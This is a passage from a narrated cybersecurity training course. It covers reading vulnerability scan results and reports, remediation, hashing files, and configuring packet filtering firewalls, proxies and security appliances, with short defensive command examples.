nothing more. If I were to click Potential Vulnerabilities on that host, [He clicks the Potential Vulnerabilities
subnode under the Vulnerability Assessment node of the 192.168.1.94 address and its content is displayed in
the Scan Results Details section.] it talks a little bit about ports that might be open and might be used by a
Trojan. In this case, for example, TCP port 9090. Now, if I open up, for that same host, the Network and
Software Audit category and expand Ports, I can see the open ports here. [He clicks the Open TCP Ports
subnode under the Network and Software Audit node of the 192.168.1.94 address and its content is displayed
in the Scan Results Details section.] So port 80 for a web server. Because it's a Windows machine with file
and print sharing, I see ports 135 and 139. But as I go further down, I can also see that port 9090, again, is
listed.
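Before going further, a quick hedged aside: if you can log on to the suspect machine itself, you can confirm which process owns an unexpected listening port such as 9090. The sketch below assumes a Linux host; the machine in this demo is Windows, where something like netstat -ano piped to findstr would be the rough equivalent.
# Minimal sketch (Linux): list listening TCP sockets with their owning processes,
# then filter for the suspicious port reported by the scan.
ss -tlnp | grep ':9090'
With that aside done, back to what the scan results suggest about port 9090.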
Now, this port is associated with a specific packet sniffer tool. And it could spell problems. Because it could be some kind of a
Trojan listener. Or it could be some kind of a back door or spyware. So this should be setting off alarm bells.
Because we might say that that is a workstation that shouldn't be running a web server, let alone some other
remote packet sniffer on port 9090. Now, when you're looking at the results of a scan, of course you're going to
want to save it to make sure it's available for historical purposes or over time so that you can start to think
about your remediation actions. So of course, in this tool, on the upper left drop-down arrow icon [He clicks
the Main Menu icon at the top of the GFI LanGuard 2014 window. A list of options appears that includes the
File option.] and under File, [A flyout appears that includes the Save Scan Results and Load Scan Results
from options.] I could choose to save the scan results. And often, it saves it in a format such as XML or CSV,
or even to a database with some tools. And in the future, you can load the scan results. However let's take a
look at a couple of other options after having run a vulnerability scan. So under the Remediate tab in this
particular tool, it's showing me things that really need attention. [The Remediate tabbed page includes the
navigation section on the left. It contains the Entire Network node, which is selected by default. Its content is
displayed in the section on the right. It includes two tabs, Remediation Center and Remediation Jobs. The
Remediation Center tabbed page includes a section that is titled List of missing updates for current
selection.] Now, on the left, I can choose specific hosts as a result of the scan. But here I've got Entire
Network selected, so it applies to all of them. And it's talking about a lot of Windows updates and Service
Packs that really should be applied. [The list includes the Critical Update and Service Pack nodes.] So for
example, under Critical Update, there are two updates here, such as one here for Server 2012 R2. And if I
expand it, I can see which hosts are missing it. Now, notice, I do have the option to remediate. Which means,
in this case, apply the updates. So not only is this tool doing a vulnerability scan, but it gives me the ability to
do something about what was found. If I were to go under the Reports tab in this particular tool, [The Reports
tabbed page includes the navigation section on the left. It contains the Entire Network node, which is selected
by default. Its content is displayed in the section on the right. It includes two tabs, Settings and Search. The
settings tabbed page includes the Reports section.] there are numerous reports that are available. And you can
run them based on the results of your scan. So for example, maybe I'll take a look at the Network Security
Overview report. [This node is selected by default in the Reports section. As a result, the section adjacent to
the Reports section is titled Network Security Overview.]
Now, on the left, again, I've got the Entire Network selected. So everything that was found through the result
of my scan settings. And if I generate the report by clicking the Generate Report button, [This button is present
in the Network Security Overview section.] let's see what we get. [Another tab, Network Security Overview,
gets added in the content section.] We should have some kind of a general security overview report based on
all of the machines that were scanned when we conducted our vulnerability assessment. Okay, so after a
minute, we've got our Network Security Overview report. And if we scroll down here, it's really nicely done.
We can see we've got nice, colorful charts. Now, it's not about the colors or the pretty pictures, it's about what
they represent. So our vulnerability level overall is flagged here as being medium. That is not good. We can
also see a pie chart here that shows us our vulnerability distribution in terms of high, medium, and low. [This
information is displayed under the Network Security Overview section.] As we scroll further down, we start to
see a breakdown. So apparently, we have no firewall issues out of what was scanned on our network. But we
have a lot of missing updates, which is a problem. [This information is displayed under the Security Sensors
section.] So as we scroll further down, we could read more and more about that report. So we've got all kinds
of great things that we can do with this. Now, you also have the option of choosing the format that you want to
use for an attachment by sending this through email or by saving it. So if I click the little icon with the floppy
disk, I see that the format is set to PDF. [These icons are present at the top of the Network Security Overview
tabbed page.] So if I were to actually click right on the icon itself, it gives me PDF Export Options. [The PDF
Export Options dialog box opens.] So we can save the report in various ways. Of course, you've also got
options available towards the upper left here, where you can search through the report for something specific
or actually print it on paper. Now, there are many other reports. We're not going to go through all of them. But,
for instance, if we're working with card holder data, like debit and credit cards, then we would be very
interested in PCI DSS compliance. So here, maybe I'll choose PCI DSS Requirement 1.2 - Open Ports. [He
selects the PCI DSS Requirement 1.2 - Open Ports subnode under the PCI DSS Compliance Reports node in
the Reports section of the Settings tabbed page. As a result, the title of the section adjacent to the Reports
section gets changed to PCI DSS Requirement 1.2 - Open Ports.] And I'll click Generate Report on the
right. [This button is present in the PCI DSS Requirement 1.2 - Open Ports section. Another tab, PCI DSS
Requirement 1.2 - Open Ports, gets added in the content section.] So really, these kinds of vulnerability
scanning tools have a lot of reporting capabilities. It takes a lot of the manual grunt work away from us, so we
can spend more time focusing on actually doing what we should be doing, securing the network.
So as I scroll down through here, I have a listing per each computer for TCP and UDP ports. Now, a -1 under
Process ID means it's not even open on that host. [He points to the TCP Ports and UDP Ports sections under
the PCI DSS Requirement 1.2 - Open Ports tabbed page.] But as we scroll further down, in this case, I can see
the computer is CM001. We've got a number of open TCP ports. And that might be required legitimately. But
it's a great report that quickly shows us the port utilization, in this case, for PCI DSS compliance.
Objectives
[Topic title: Vulnerability Remediation. The presenter is Dan Lachance.] In this video, I'll discuss
vulnerability remediation. It's one thing to identify vulnerabilities, but it's another to remove or mitigate them.
We address identified vulnerabilities ideally before malicious users do, and we might be required to do this for
legal or regulatory compliance reasons. So ideally, we'll have an automated schedule by which we get
vulnerability scan results so that we can identify these vulnerabilities. Manual remediation is possible. So for
example, if we discover that Remote Desktop is enabled on crucial Windows servers and we don't want it
enabled, then we could manually turn off Remote Desktop on each and every server that has that configuration.
Of course, enterprise class tools will always have a way to automate this remediation. Now it can also include
things like missing software patches, security misconfigurations, even the detection of malware where we've
configured it to automatically quarantine or remove the offending software. Vulnerability remediation allows
us to prioritize our vulnerabilities. We can then determine the business impact if those vulnerabilities were to
be exploited. So business process interruption, or it could even have an impact in a different way, such as by degrading
IT system performance. Sandbox testing allows us to have a controlled environment to observe the
effectiveness of a remediation.
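To make the manual-versus-automated point a little more tangible, here is a hedged sketch of scripting a single manual remediation across many hosts instead of visiting each one. The host list file, the admin account, and the service being disabled are all hypothetical placeholders, and this is separate from the SCCM example that follows.
# Minimal sketch: apply one remediation (disabling an unwanted service) across a
# list of Linux servers over SSH. File name, account, and service are placeholders.
while read -r host; do
  ssh "admin@${host}" 'sudo systemctl disable --now telnet.socket'
done < servers.txt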
So when the IT technicians are testing vulnerability remediation, whether it be manual or automatic, this
should be done in a controlled environment. Often, it's done in a virtualized environment. Whether you've
already got that available on premises on your own equipment, or whether you're doing it in the cloud where it
takes only a few moments to spin up virtual machines to test things. When we implement remediation, we have
to think about remediation inhibitors. Some inhibitors include cost. It might be too expensive to pay for the
time for someone to get this configuration for auto remediation, for example, up and running. There's also
complexity. Now really, it's like anything that's worth doing: if you take the time to focus on it properly from
the beginning and do it right the first time, configuring auto remediation is not really
that complex. Now there are laws and regulations that might stipulate that we must enable auto remediation.
As an example, consider a configuration baseline here in Microsoft System Center Configuration
Manager. [The Baseline tabbed page of the System Center Configuration Manager window is open. It includes
the Assets and Compliance section.] A baseline contains numerous settings. In this case, we're checking
registry settings for a line of business apps. Now if I were to right-click on that configuration baseline, and if I
were to choose Deploy to apply it to a collection of devices, [The presenter right-clicks the Check client
Custom LOB App settings subnode under the Assets and Compliance section and selects the Deploy option
from the shortcut menu. As a result, the Deploy Configuration Baselines dialog box opens.] one of the things I
would notice is I have the option to remediate noncompliant settings when supported. [The Remediate
noncompliant rules when supported checkbox is present in the Deploy Configuration Baselines dialog
box.] So for instance, if we've got specific settings for an application, and maybe those are simply registry
entries, then we could auto-remediate that if it would make that application more secure as an example. Now to
finish this example, I would have to specify a collection down here by clicking the Browse button of users or
computers, [The Browse button is present adjacent to the Collection field under the Select the collection for
this configuration baseline deployment section. As a result, the Select Collection dialog box opens. It includes
a drop-down list box.] in this case devices [He selects the Device Collections option in the drop-down list
box.] where I want this done. So maybe I'll choose the All Systems collection. So we can deploy our
configuration baseline with auto-remediation to the devices of our choosing. On a larger network, it's a good
idea to have some kind of central way to deploy remediations, even if that's in the form of updates, as opposed
to going to each system one at a time. So we also need a way to track progress and run reports on either the
success or failure of implementation of remediation solutions.
So, over time, we can also run reports or future scans to track the effectiveness of any fixes that have been
applied. And we can update organizational security policies, or documentation, even documentation used in
training for new user onboarding, as required.
Objectives
Exercise Overview
[Topic title: Exercise: Describe Ways of Reducing Vulnerabilities. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining the difference between symmetric and asymmetric encryption.
Then after that you'll explain the purpose of Identity Federation, followed by describing the contents of a PKI
certificate. And then it's on to the action, where you'll compute a file hash using Windows. And you'll do the
same thing except you'll compute the file hash using the Linux operating system. At this point, pause the
video, perform each of the exercise steps and then come back to view the solutions.
Solution
Symmetric encryption uses the same key for encryption and decryption.
The key is called a shared secret. But it doesn't scale well because it's difficult to securely transmit this key to
multiple users. With asymmetric encryption, two keys are used, one for encryption and one for decryption.
Unique mathematically related public and private key pairs are issued to users, devices, or applications, where
the public key is used to encrypt and the private key is used to decrypt. Identity Federation allows us to use a
centralized identity provider that supports single sign-on. Applications have to be configured to trust the
identity provider. And likewise, the identity provider must be configured to trust applications. After successful
authentication, the result is a digitally signed security token from the identity provider. Applications verify that
signature authenticity before allowing resource access. So Identity Federation removes the need for
multiple sets of credentials. Among other items, a PKI Certificate will contain the digital signature of the
issuing Certificate Authority.
It will include the subject name, which might be an email address or the URL of a web site. It will include a
public key (but not the private key, which is kept secret by the certificate holder), key usage details, as well as an expiry date. We can open up PowerShell in Windows
to generate a hash of a file. We can use the Get-FileHash cmdlet followed by the name of the file.
Here, I've got a text file called Project1.txt. [He executes the get-filehash .\Project1.txt command.] Notice that
we've got the hash visible here. Any changes made to the file will result in a different hash value if we run the
Get-FileHash cmdlet in the future. In the Linux environment, I can use the md5sum command to generate a
file hash. Here I've got a file called log1.txt. So I'm going to type md5sum log1.txt. [He executes this
command in the root@kali command prompt window.] And here we can see the resultant hash, which will be
different if the contents of log1.txt change.
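As a quick illustration of that last point, the short sketch below reuses the same md5sum command to show the hash changing after the file is modified; the file name and contents are just examples.
# Minimal sketch: any change to a file produces a different hash value.
echo "initial contents" > log1.txt
md5sum log1.txt
echo "one more line" >> log1.txt
md5sum log1.txt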
Table of Contents
After completing this video, you will be able to recognize the purpose of various types of firewalls.
Objectives
[Topic title: Firewalling Overview. The presenter is Dan Lachance.] In this video I'll do a firewalling
overview. Firewalls come in either hardware or software form and their general purpose is to control the flow
of network traffic into or out of a network or even an individual host.
Now we can configure our firewalls with on-premises equipment or we can do it, if it's supported by a public
cloud provider, in the cloud. Firewall solutions from Palo Alto Networks also include virtual machine
appliance firewalls that are pre-installed and require only custom configuration. Now stateful firewalls are
designed to track connection state, or sessions, as opposed to each individual packet within the session. Now
this is considered more secure than a stateless firewall which does just that, it tracks each individual packet and
does not have the capability to track a session. All computing devices should really have a firewall solution
installed. This includes servers, desktops, laptops, tablets, and of course, smartphones. A packet filtering
firewall is one that examines packet headers as seen pictured here on the right-hand side of the screen. [The
following information is displayed: Source port: https (443), Destination port: 55940 (55940), Stream index: 38,
Sequence number: 91765 (relative sequence number), Acknowledgement number: 19197 (relative ack number),
Header length: 32 bytes, Flags: 0x10 (ACK), Window size: 309.] So for instance, in this packet header, we see
a source and a destination port, a sequence
number, an acknowledgement number, which means it must be a TCP header. We see things like header
length, and so on. So packet filtering firewalls can look at many of these types of fields to decide whether
traffic is allowed or denied. So by looking at things like the IP protocol ID, source and destination IP address,
as we see in our picture here on the screen, the source and destination port number, maybe the ICMP message
type or additional IP options and flags. A web application firewall is a little bit more detailed because it's
designed to really dig a little bit deeper in the packet payload beyond just the headers.
It's often referred to as a WAF, a W-A-F, and it is specific to HTTP connections, whereas packet filtering
firewalls can look at any type of traffic. Another type of firewall is a proxy server. It's designed to retrieve
Internet content for internal clients that request it, so it's really masking or hiding the true identity of those
requesting clients. Another benefit of a proxy server is content that is retrieved can be cached to speed up
subsequent requests. A reverse proxy server listens for connection requests, for example from Internet clients
for a given network service such as a web server. So for instance, the proxy server might listen for TCP port 80
web site connections. And then what it will do is take those incoming connections from the Internet and
forward them to an internal host, a web server, listening elsewhere, ideally on a different port number. But it
doesn't have to be a different port number. Address translation is another way to firewall where it hides the
internal identity of hosts. However, routing needs to be enabled on your translation device and the hosts that
need to use that translation device. For example, if you're going to be using port address translation to get a
bunch of clients out on the Internet, they need to point to that translation device as their default gateway.
Network address translation, often called NAT, means that we've got multiple external-facing public IPs that
each map to a different internal private host IP. So we're protecting the true identity of those internal hosts,
while allowing incoming connections from the outside. Port Address Translation is often referred to as PAT.
This is where we can allow multiple internal clients to access the Internet through a single public IP address
configured on the PAT device. We then have to consider encrypted traffic when thinking about firewalls. So,
for example, if packet headers are encrypted, firewalls won't be able to read them. Now, there are some
exceptions.
Some firewalling tools will allow you to inject some kind of a certificate or key to decrypt transmissions. But
for the most part, when we talk about encrypted network traffic, it's not the headers that are encrypted. Usually
we're talking about the payload or the actual data that is encrypted. We should also consider the use of a
variety of firewall vendor solutions to increase security. So for example, if one of our firewalls gets
compromised by a malicious user they won't be able to use that same exploit against another firewall in the
enterprise because we would be using a different vendor's solution. We should also consider how we're going
to have a central standardized way to configure and deploy firewall settings to numerous devices. We might do
this through scripts, whether that's a Linux shell script or a Windows PowerShell script. We might even use
PowerShell Desired State Configuration, or DSC, to configure firewall settings on multiple devices, including
Linux. Or if you're in an Active Directory environment, you might consider the use of Active Directory and
group policy to essentially configure the Windows firewall for Windows devices.
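As a minimal sketch of that scripted approach on the Linux side, a common rule set could be pushed to several hosts over SSH. The host names and the baseline.rules file here are hypothetical examples, not from this course:

#!/bin/bash
# Push a common firewall baseline to several Linux hosts over SSH.
# fw-host1..3 and baseline.rules are illustrative names.
for h in fw-host1 fw-host2 fw-host3; do
  scp baseline.rules "$h":/tmp/baseline.rules
  ssh "$h" "iptables-restore < /tmp/baseline.rules"   # load the rules on each host
done

In practice, a configuration management tool, PowerShell DSC, or group policy, as mentioned above, would usually be preferred over a hand-rolled loop like this.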
After completing this video, you will be able to recognize how firewall rules are created based on what type of
traffic should or should not be allowed.
Objectives
recognize how firewall rules are created based on what type of traffic should or should not be allowed
[Topic title: Firewall Rules. The presenter is Dan Lachance.] In this video I'll talk about Firewall Rules.
Firewall Rules control network traffic flow. Traffic is either allowed or denied on a per-network interface
level. A firewall appliance, whether it's a server, physical or virtual, with multiple network interfaces or a
router, is going to have more than one interface, so we then can control the rules and tie them to a specific
interface. So the traffic can be coming into an interface or it could be leaving an interface, and when we
configure Firewall Rules, depending on the product that we're using, we'll have to specify that distinction.
Firewalls can be network based, so we have to think about the placement of the firewall appliance, so that it
can see all the traffic that it potentially would allow or deny. And of course, every host on the network, be it a
server, a laptop, or a smartphone, and so on, should have a host based firewall configured, in addition to our
network based firewall solutions. With Firewall Rules we should have a deny all traffic by default rule.
Then we would add rules to allow traffic only as we need them. So for instance if we need to allow HTTP
traffic then we could add a rule to allow that. But if any packets come in through the firewall that don't match
that HTTP rule then our deny all by default would kick in. Rules are processed using a top-down approach. So
the first matching rule, meaning the first rule whose criteria match what's in a packet, gets executed and
no further rules get checked. So the last rule in your list of rules should be a deny all. Some products will
actually display this because it's there automatically whereas others won't display it even though it is effective.
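As a rough sketch of that deny-by-default posture using Linux iptables (the allowed port here is just an example), the idea looks like this:

iptables -P INPUT DROP                                              # default policy: deny all inbound traffic
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT    # allow replies to traffic we initiated
iptables -A INPUT -p tcp --dport 443 -j ACCEPT                      # then allow only what's needed, e.g. HTTPS

Anything that doesn't match an allow rule falls through to the default policy and is dropped.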
Here on the screen we see some examples of inbound rules. [A table with six columns and four rows is
displayed. The column headers are Allow/deny, Protocol type, Source, Destination, Port, and
Interface.] Where we get to decide in the left most column whether we are allowing or denying traffic. Notice
our last rule at the bottom denies all protocols from all sources going to all destinations for all interfaces.
However, our first rule allows TCP traffic from a specific source subnet of 172.16 with a 16 bit subnet mask.
And it allows that type of traffic to a specific host, in this case 172.16.0.56 for port 22 which is used for SSH
remote administration. And that's allowed on our firewall device through interface Ethernet zero.
Now we can also see the second example allows TCP traffic from all sources to all destinations as long as the
port number is 443, so HTTPS secured web traffic. And that again is tied to interface eth0. Our third rule
allows UDP traffic from any source to a specific destination going to port 53. Now if you recall, DNS client
queries are sent to UDP port 53 on the DNS server. So this is allowing DNS server queries from clients to
reach host 172.16.0.100. We should also consider whether or not we're going to log firewall actions, whether
packets are accepted or dropped because they don't meet the conditions that were specified in rules. If we're
going to turn on logging, then we probably want to turn on log forwarding so that our log information is stored
on another host as well. So if the firewall appliance itself gets compromised, while the logs can't be trusted of
course, we've got a copy elsewhere on a trusted host. In our logs we also have to decide whether or not we
want to see IP addresses for the data that we're logging to the firewall. Or, whether we want to do reverse DNS
name lookups to see the actual DNS names of the hosts connecting through the firewall. Now in many cases
you probably don't want to use reverse DNS name lookups while the log information is being generated,
because it's a little too resource intensive and takes time to do the reverse lookups. So instead, another option is
to have IP addresses of hosts logged in the firewall logs. And then if you need to when you're analyzing the
logs later, you can do the reverse DNS name lookups to get the names of the hosts if that's helpful. And that
could be a manual or an automated process.
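As a quick illustration of that later analysis step, assuming a hypothetical file called firewall_ips.txt containing one logged IP address per line, the reverse lookups could be automated with a small loop:

while read ip; do
  echo -n "$ip -> "
  dig +short -x "$ip"    # reverse DNS lookup for each logged address
done < firewall_ips.txt

In this video we talked about Firewall Rules.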
[Topic title: Packet Filtering Firewalls. The presenter is Dan Lachance.] In this video, I'll discuss packet
filtering firewalls. Packet filtering firewalls are also called Layer 4 firewalls.
This is because they are designed to examine packet headers, specifically things like UDP and TCP headers,
which map to Layer 4 of the OSI model. So therefore, a packet filtering firewall cannot examine the packet payload.
It can't look at the actual data, such as a specific URL that the user is connecting to, or a specific HTTP GET
request. So therefore, restrictions based on specific websites, or on data within packets, are simply not
possible with packet filtering firewalls. Packet filtering firewalls can be stateless, where each individual packet
is seen as a separate connection. Also, a packet filtering firewall might be stateful, where it tracks packets
within a session.
When we configure a packet filtering firewall, we allow or deny traffic based on criteria. Which includes
things such as an IP protocol ID, which implies what type of packet this really is. Or a source and destination
IP address that specifically would apply to Layer 3 of the OSI model. We might also have a source and
destination port number, an ICMP message type, IP options and flags, and so on. Pictured on the screen, we've
got a red arrow pointing to the headers within a packet capture. [Dan refers to the following information
displayed on screen: Frame 91 (453 bytes on wire, 453 bytes captured), Ethernet II, src: 90:48:9a:11:bd:6f
(90:48:9a:11:bd:6f), Dst: 14:cf:e2:9f:9b:e7 (14:cf:e2:9f:9b:e7), Internet Protocol, src: 192.168.0.8
(192.168.0.8), Dst: 192.229.163.25 (192.229.163.25), Transmission Control Protocol, src port: 57683
(57683), Dst Port: http (80), seq: 400, Ack: 56918, Len: 399, Hypertext Transfer Protocol. ] The headers
begin with the Ethernet II header, which contains information such as the source and destination MAC
address. We then see the Internet protocol or IP header, which, among other things, contains the source and
destination IP address. We can also see the Transmission Control Protocol header here in our screenshot, the
TCP header. Which, among other things, shows us the source and destination port for the connection, as well
as things like sequence and acknowledgement numbers. Finally, we can also see the Hypertext Transfer Protocol
header, which is selected.
But down at the bottom in this packet capture we see the actual hexadecimal representation of that data, or
payload, on the left, and the ASCII equivalent on the right. So a packet filtering firewall will not be able to go
in and read that payload as we see it at the bottom of the screen. So again, it can't take a look at a file that a
user requested from a website. So a packet filtering firewall then really applies to Layers 3 and 4. So when we
say it's a Layer 4 firewall, it also covers the layers beneath it, such as Layer 3. It can deal with protocol types, IP addresses,
port numbers, and so on. In our example on the screen we've got 3 firewall rules. The first rule is an SSH TCP
port 22 rule, to allow SSH remote administration traffic. [A screenshot of a web page is displayed. The page
displays a table with many columns and three rows. Some of the column headers are Rule#, Type, Protocol,
Port Range, Source, Allow/Deny. The table displays three types of rules. The Add another rule button is also
displayed.] We can see that we can specify a source, which in this case is an entire subnet, 172.16.0.0/16. And
of course, our rule is set to allow. Below it we are allowing HTTPS port 443 traffic from any source. And our
last rule here is denying all traffic from all sources. Common packet filtering firewall products include
configuring network access control lists, or ACLs, on your router, whether you're using a Juniper or Cisco
router. You can also configure the Windows firewall solution, or you could use the Linux and Unix iptables
command, or a newer derivative such as the firewalld daemon. Or you might use other tools, such as
Check Point Firewall-1, the list goes on, and on, and on. In this video we discussed packet filtering firewalls.
[Topic title: Configure a Packet Filtering Firewall. The presenter is Dan Lachance.] In this video, we'll take a
look at how to go about configuring a packet filtering firewall. There are plenty of packet filtering firewall
solutions out there. Some are newer. Some are older. Some are command line based. Some are GUI-based
through a web interface. It just goes on and on. We're going to start by taking a look here at the built-in
Windows Server Operating System Firewall. So I'm going to go to my Windows Start menu and type in fire.
And I'm going to click on Windows Firewall with Advanced Security. Here in this tool, I can see on the left,
I've got a number of inbound rules, as well as a number of outbound rules to control traffic leaving this server.
If I go back to Inbound Rules, you'll notice that the icon to the left of some of the rule names looks like a green
circle, which means it's a rule that's enabled. Whereas others look like a golden padlock, which means it's a
rule that only allows access if there's some kind of a secured connection. Either using IPsec or maybe the rule
is configured to only allow connections from certain user accounts or computers. Any rules that have a grayed
out icon are disabled. So we're going to go ahead and right-click on Inbound Rules on the left and choose New
Rule. We're going to build a rule to allow inbound SSH traffic.
Now there's not an SSH service by default in the Windows Server OS, but certainly we could install one. So
let's assume that we've got one installed and we want to allow connections to it. So we're going to go ahead
and choose Port. We could also alternatively have built a firewall rule based on a program or from the
predefined list of common things that are done. Or we could build a custom rule. Here it's going to be a port.
So I'll choose that and I'll click Next. We know that SSH uses TCP port 22. So I'm going to go ahead and
specify that specific port. But notice in the example, I could have a comma separated list of ports I want to
allow through this rule. Or a range of ports with a starting and ending range and, of course, it is inclusive. So
I'm going to go and click on Next.
I want to allow the connection. Although I could choose allow the connection if it's secure. Again, I could do
that for IPsec, or to make sure that only certain user accounts can connect, or that SSH connections can only come from certain
computers. I could also block the connection. But in this case I want to allow it. So I'll go ahead and click
Next. In Windows, we have various profiles that apply, depending on if the user is connected to an Active
Directory domain network, a private network, or public.
So what I want to do here is make sure that this only applies when people have their computers at work. Or in
this case, since it's a server, it would never be on a different network like at Starbucks or on a home private
network. So, I'll go ahead and click Next, and I'm going to call this Allow inbound SSH. And I'll go ahead and click
Finish. And we can see now in the list we've got an active rule, it's got the green circle with the white check
mark, called Allow inbound SSH. Now of course we could do this from the command line using PowerShell
cmdlets if we really wanted to. However, let's take a look at how we would configure a simple packet
filtering rule on the Linux platform. Most Linux distributions support the old iptables command as a way of
configuring packet filtering firewall rules. Although there are other options, including graphical ways of
configuring tools. Here we're going to type iptables -L for list. Here we can see that our input chain has a
policy of accept. So it's going to accept everything from anywhere going to anywhere on this host. What we're
going to do is we're going to make sure it only allows SSH. So, I'm going to type iptables -A. I want to add an
INPUT rule with -p tcp for the protocol. I want to match tcp with -m tcp, and the destination port, or --dport, is going to be
22, because that's what SSH uses. So then -j ACCEPT.
I don't want to drop, I want to accept that traffic. And I'm also going to add another rule here. So iptables -A in
the INPUT chain -j DROP. Basically all I want to allow is inbound SSH and drop everything else. So now if I
type iptables -L for list I can now see that we're allowing inbound SSH for the TCP destination port and then
dropping everything else. Let's test to see if that's actually working correctly. Before we test this let's type
ifconfig to see what our IP address is. And here we can see clearly it's 192.168.1.91. Okay, let's go test it. From
a different computer I'm going to ping 192.168.1.91 and notice of course we don't get a response. Because that
traffic should be dropped. The only thing allowed into that Linux host is SSH. So naturally we're going to try
to use PuTTY to open up an SSH session to that same IP address. So we can see we're going to open up an
SSH session on Port 22 on that same IP address. So I'll go ahead and click Open.
And after a moment it asks me to log in. So I'm going to go ahead and specify the appropriate credentials and
we are in. Again if we do an iptables -L for list, we can see the rules that are in place to make this happen.
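To recap the Linux portion of that demo, the commands entered were roughly the following (interface and address details will of course vary per environment):

iptables -L                                             # list the current rules
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT    # allow inbound SSH
iptables -A INPUT -j DROP                               # drop everything else, appended after the SSH rule
iptables -L                                             # verify the chain now shows both rules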
Another type of packet filtering solution is in the cloud. Here I'm connected to my Amazon Web Services
account where I'm viewing one of my VPCs or Virtual Private Clouds called PubVPC1. A VPC is just a
network that you've defined in the cloud. But what's interesting is that you can define a network ACL or
Access Control List for each VPC in the Amazon Web Services Cloud. The same types of things are possible
with other cloud providers like Microsoft Azure as well. So having that VPC selected here in the list, I'm going
to go down and click on the link next to network ACL. That's going to open up another window where we can
actually start to work with the packet filtering rules for this network, which actually exists in the cloud.
Having my network ACL selected down below I can see the Inbound Rules tab where we have a list of
inbound rules. Which in this case is allowing traffic from anywhere into the network. In the same way, we've
got Outbound Rules to control traffic leaving this cloud network. So, I'm going to go back to the Inbound
Rules tab and click the Edit button. What we want to do here is change our first rule to allow, not all traffic,
but in our example, only SSH port 22 traffic. And I'll leave the source as 0.0.0.0/0 which means from
anywhere. Now, we don't want this second custom rule being built here. So, I'll click the x to remove that and
I'll click Save. Now, after a moment, that network ACL for that cloud virtual network is now saved. And we
can see down below that we are allowing inbound SSH traffic but blocking everything else. Because the
second rule is a DENY rule.
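The same kind of network ACL entry could also be created from the AWS command line rather than the console. As a rough sketch, with a purely hypothetical ACL ID, an inbound SSH allow entry might look like this:

aws ec2 create-network-acl-entry --network-acl-id acl-0123456789abcdef0 --ingress \
  --rule-number 100 --protocol 6 --port-range From=22,To=22 \
  --cidr-block 0.0.0.0/0 --rule-action allow
# protocol 6 is TCP; the ACL ID above is a placeholder, not the one from this demo

In this video, we learned various ways to configure packet filtering firewalls.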
[Topic title: Proxy Servers. The presenter is Dan Lachance.] In this video, I'll talk about proxy servers. A
proxy server eliminates direct connectivity between internal clients and Internet resources and, depending on
the type of proxy server, between Internet clients and internal resources like a protected web server. So
really, we're talking about protecting the host's identity, where outgoing traffic appears to come from the
proxy.
So that way, the true internal IP address of the host is never known. So, we must configure a proxy server for
specific applications. So, we would have HTTP proxies, FTP proxies, and so on. Transparent proxies don't
require any client configuration. So in other words, as long as the client is configured with the default gateway,
that device, the default gateway, would normally be their proxy server that they connect through to request
content from the Internet. But again, with a transparent proxy, you don't have to go, for instance, into your web
browser and tell it the address and port number of the proxy server. Proxy servers are designed to retrieve
Internet content for internal requesting clients. And that content can be cached to speed up requests for the
same stuff later.
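When the proxy is not transparent, the client does have to be told where it is. As a small illustrative example on a Linux client, assuming a hypothetical proxy host name and Squid's default port of 3128:

export http_proxy="http://proxy.example.internal:3128"
export https_proxy="http://proxy.example.internal:3128"
curl -I https://www.example.com    # this request is now sent via the proxy rather than directly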
However, the great thing about this is that the internal client identity is never revealed. Now, proxy servers
examine not only packet headers, like a packet filtering firewall, but they also can examine the payload. So for
instance, that means the proxy server would be able to block connections to facebook.com even outside of
specific hours. Now, on a proxy server device, we want to make sure IP routing is disabled. Because we don't
want things being routed out to the Internet at the IP level, thereby bypassing the proxy server. We want the
proxy server to have to examine everything. Proxy servers are sometimes also called caching servers. And it
really depends on how the proxy server gets configured as to whether or not it's configured to cache content.
Proxy servers can also be configured to prefetch Internet content on a scheduled basis. The result of this is that
it speeds up access for that content when clients actually request it. So for instance, if we know that every
morning users need to see information from certain webpages, we can have that pre-cached to speed up their
experience. But we also have to consider the static and dynamic nature of the cached content.
If it's stock quotes that change all the time, we probably wouldn't want to prefetch that type of streaming
information. We can also configure cache aging timers, which is often called the Time To Live or TTL. So,
once data is expired after it's been cached, that cached content gets removed from the server. A reverse proxy
server listens for connection requests for a given network service. So for example, it might listen for TCP port
80 web site connections. Incoming connections to the reverse proxy server get forwarded to an internal host
elsewhere. So for instance, we might forward requests to a protected web server elsewhere listening on either
port 80 or some other port. Normally, reverse proxy servers are placed in a demilitarized zone for publicly
accessible services.
So, it protects the true identity of the internal host offering that network service and it's completely transparent
to external users. They think they're connecting to the real thing. So, this is great because the fact that we're
even using a reverse proxy isn't even known by client devices. There are public proxies that are available out on
the Internet that can anonymize Internet user connections. Now, this could be used for example to allow the
bypassing of normal surfing restrictions, such as media content that is only served within certain countries.
Well, using a proxy anonymizer on the Internet, you can make it look like you're coming from another country.
Now, I'm not suggesting that that's something you should do. It may or may not be legal where you are, but it
is possible. It's part of the technology that's out there. Another way a public proxy might be used is so that we
could use social media that's normally prohibited at school or at work. But again, if the rules are in place,
there's usually a good reason, especially at work. So, in essence what it really means is that the Internet user
appears to be initiating connections from a different location. Common proxy server products include Squid,
WinGate, the Cisco Web Security Appliance, and Check Point's Security Gateway. In this video, we talked
about proxy servers.
After completing this video, you will be able to explain the purpose of a security appliance.
Objectives
[Topic title: Security Appliances. The presenter is Dan Lachance.] Firewalls are used to control network
traffic flow by either allowing or denying traffic based on configured criteria. But what about using more than
one type of firewall at once? In this video, we're going to address that by talking about security appliances.
A security appliance is a type of firewall and in some cases it might be specialized. So for example, it might be
focused on intrusion prevention. But at the same time, a security appliance might also be an all-in-one multiple
capability firewall. So that could come in hardware form, where it might be rack-mounted equipment in a
server room or a data center. Or it could come in software form, where we might use various preconfigured
virtual machines that are pretty much ready to go, just a little bit of tweaking is required to get them running as
a security appliance. Of course, you could install your own physical or virtual machine and configure multiple
firewall products manually.
Security appliances, because of their nature, could be an all-in-one firewall, so their capabilities are quite far
reaching. They will have the ability to perform stateful packet filtering with the configuration of network
ACLs. They will have proxying capabilities. In some cases, also reverse proxying. They'll be able to filter
traffic at layer seven of the OSI model, application specific. They might also serve as a VPN appliance, to
allow VPN connections into a private network. A security appliance could also have intrusion detection and/or
prevention capabilities. It might also check for malware, it might also have antiphishing built in. Might even
have video surveillance capabilities built in. So as you can see, a security appliance really could be all
encompassing. It really depends on the specific vendor product that you're using as a security appliance.
